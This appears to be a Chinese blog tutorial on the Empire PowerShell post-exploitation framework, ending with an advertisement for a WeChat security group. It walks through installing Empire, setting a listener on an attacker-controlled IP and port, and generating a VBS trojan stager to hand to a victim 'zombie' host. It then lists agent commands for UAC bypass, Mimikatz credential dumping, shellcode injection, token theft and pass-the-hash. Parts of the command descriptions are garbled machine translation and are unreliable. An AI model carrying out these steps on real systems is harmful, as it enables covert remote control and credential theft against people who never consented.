Empire是一个PowerShell后期漏洞利用代理工具同时也是一款很强大的后渗透测神器,它建立在密码学、安全通信和灵活的架构之上。Empire实现了无需powershell.exe就可运行PowerShell代理的功能。快速部署后期漏洞利用模块,从键盘记录器到Mimikatz,并且能够适应通信躲避网络检测,所有的这些功能都封装在一个以实用性为重点的框架中
虽然渗透的目标是windows,但Empire本身应该是运行在linux平台的,首先把程序目录下载下来:
git clone EmpireProject/Empire
接着就转进”Empire/setup”目录,安装./install.sh。
sudo ./install.sh
执行 sudo ./empire #执行工具操作
执行 listeners #进入监听列表
如果出现[!] Invalid listener name 那么先执行 uselistener http 选择http模块 再执行info 即可, 跳出就back
直接命令
set Name hacker
set Host http://192.168.1.14:443
设置完之后:
然后执行: run #运行监听。 运行监听之后生成木马。 如果没有run 命令就用 execute 取代run命令
执行:usestager 空格 然后Tab按键 会出现
bunny ducky hta launcher_bat launcher_vbs pth_wmis stager war dll hop_php launcher launcher_sct macro scrambled_macro teensy
Windows 就选择 launcher_bat launcher_vbs 等。。 PHP 就选择 hop_php
比如我选择: launcher_vbs
执行:usestager launcher_vbs 监听列表的名字 #这里就是hacker, hacker就是我刚刚设置的监听列表名字 (set Listener hacker)
然后执行:info 查看设置配置,木马脚本放在了 /tmp/launcher.vbs
然后执行:execute #运行 生成木马,生成成功 然后执行: sudo chmod 777 /tmp/launcher.vbs #赋予可读可写权限 然后丢给肉鸡运行
生成成功
然后查看肉鸡列表 执行命令: agents PS:如果你exit了 也就是退出了 你也可以直接执行agents命令查看肉鸡列表
如果要控制肉鸡的话:
就执行: interact 肉鸡的名字
进入之后 执行帮助 help 查看 肉鸡控制器的命令
agents 跳跃的代理人的菜单
back 返回菜单
bypassuac 运行bypassuac,开创一个新的高完整性为监听代理。产卵<监听器>
clear 清除代理任务。
creds 从数据库显示/返回凭证。
download 任务代理下载文件
exit 任务代理退出
help 显示菜单或语法for the help特定的命令。
info 显示有关此代理的信息
injectshellcode listener shellcode inject进入偏远的过程。前listener米。injectshellcode<><>_ PID
jobs 返回工作或杀死一个正在运行的工作
kill 任务杀死特定进程名称或ID.的代理
killdate 获取或设置一个代理的killdate(01 / 01 / 2016)。
list 列出所有活动代理(或侦听器)
listeners 跳转到监听器菜单
lostlimit 任务代理更改丢失代理检测的限制
main 回到主菜单
mimikatz 运行在客户端- mimikatz Invoke
psinject inject发射器向远程进程。例如,psinject > <名> < PID
pth 执行一个credid PTH通过Mimikatz。
rename 重命名代理
revtoself 使用凭证/令牌还原令牌权限。
sc 需要截图,默认是PNG。给一个比率意味着使用JPEG。例SC [ 1 ]
scriptcmd 执行在目前进口PowerShell脚本函数。
scriptimport 进口的PowerShell脚本保存在存储器中的代理。
searchmodule 模块搜索帝国名称/描述。
shell 使用shell命令的代理任务。
sleep 任务代理睡眠间隔[抖动]
spawn 对于给定的听众产生一个新的帝国代理名称。产卵<监听器>
steal_token 使用凭据/代币冒充一个令牌的进程ID。
sysinfo 任务获取系统信息的代理
updateprofile 更新代理连接配置文件
upload 任务代理上传文件
usemodule 使用一个帝国的PowerShell模块
workinghours 获取或设置一个代理的工作时间
执行肉鸡命令: shell 你想执行的系统命令
三、结束攻击
如果你想删除肉鸡:
执行:agents #查看肉鸡列表
执行:remove 肉鸡名字
如果你想关闭监听:
首先执行: listeners 查看监听列表
然后执行: kill 监听列表的名字 结束掉进程
最后喜欢我文章的朋友请加圈子关注我们,私信关键词:加群。(送免费资料和优惠券)
就会自动分享给你群号。欢迎大家加入我们的安全大家庭。提高大家的安全意识,提升大家的网络安全技能一直是我们的初衷和愿景,让我们共同成为守护信息世界的"SaFeMAN"。
还有可以关注我们微信公众号,在公众号上输入安界网,就可以关注到我们,领取资料和优惠券!